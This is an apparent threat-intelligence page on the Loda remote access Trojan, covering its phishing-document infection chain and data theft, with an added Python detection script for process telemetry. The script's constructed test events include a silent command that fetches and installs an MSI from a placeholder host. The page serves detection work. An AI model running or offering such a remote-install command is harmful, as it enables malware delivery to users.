Loda RAT, first detected in 2017, is slowly maturing into an effective yet simple remote access Trojan. It steals usernames and passwords and session cookies, and it can take screenshots too. The current version in the wild is 1.1.1. The infection process is simple: it starts with a phishing e-mail carrying a Microsoft Word document as an attachment.
The document is obfuscated, which hides it from AV detection. Once the document is opened, an MSI file is downloaded and executed, which smuggles data from the victim machine to its command and control server.
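One way to hunt for the chain described above (Word document opened, MSI downloaded and executed) in process-creation telemetry, as an added example that is not part of the original page. The events are constructed, and the assumption that the MSI is installed through `msiexec.exe`, possibly from a remote URL, is ours; the page does not say how the MSI is run.

```python
import ntpath
import re

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events with Sysmon Event ID 1 style fields (not real telemetry).
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'WINWORD.EXE /n "C:\Users\a\Downloads\invoice.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c msiexec /q /i http://files.example.test/update.msi"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec /q /i http://files.example.test/update.msi"},
    # Benign: user installs a local MSI from Explorer.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec /i "C:\Users\a\Downloads\7zip.msi"'},
]

def proc_name(ev):
    return ntpath.basename(ev["image"]).lower()

def has_word_ancestor(ev, by_pid):
    """Walk the parent chain so an intermediate cmd.exe does not hide Word."""
    seen = set()
    while ev and ev["pid"] not in seen:  # guard against loops in bad data
        seen.add(ev["pid"])
        ev = by_pid.get(ev["ppid"])
        if ev and proc_name(ev) == "winword.exe":
            return True
    return False

def detect(events):
    """Return (pid, reasons) for each msiexec launch matching the chain."""
    by_pid = {e["pid"]: e for e in events}  # ignores PID reuse for brevity
    findings = []
    for ev in events:
        if proc_name(ev) != "msiexec.exe":
            continue
        reasons = []
        if has_word_ancestor(ev, by_pid):
            reasons.append("word_ancestor")
        if REMOTE_URL.search(ev["cmd"]):
            reasons.append("remote_msi")
        if reasons:
            findings.append((ev["pid"], reasons))
    return findings

if __name__ == "__main__":
    for pid, reasons in detect(EVENTS):
        print(pid, reasons)
```
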
Loda RAT Document Signatures
Loda RAT Document Download
Loda RAT MSI Signatures
Loda RAT MSI Download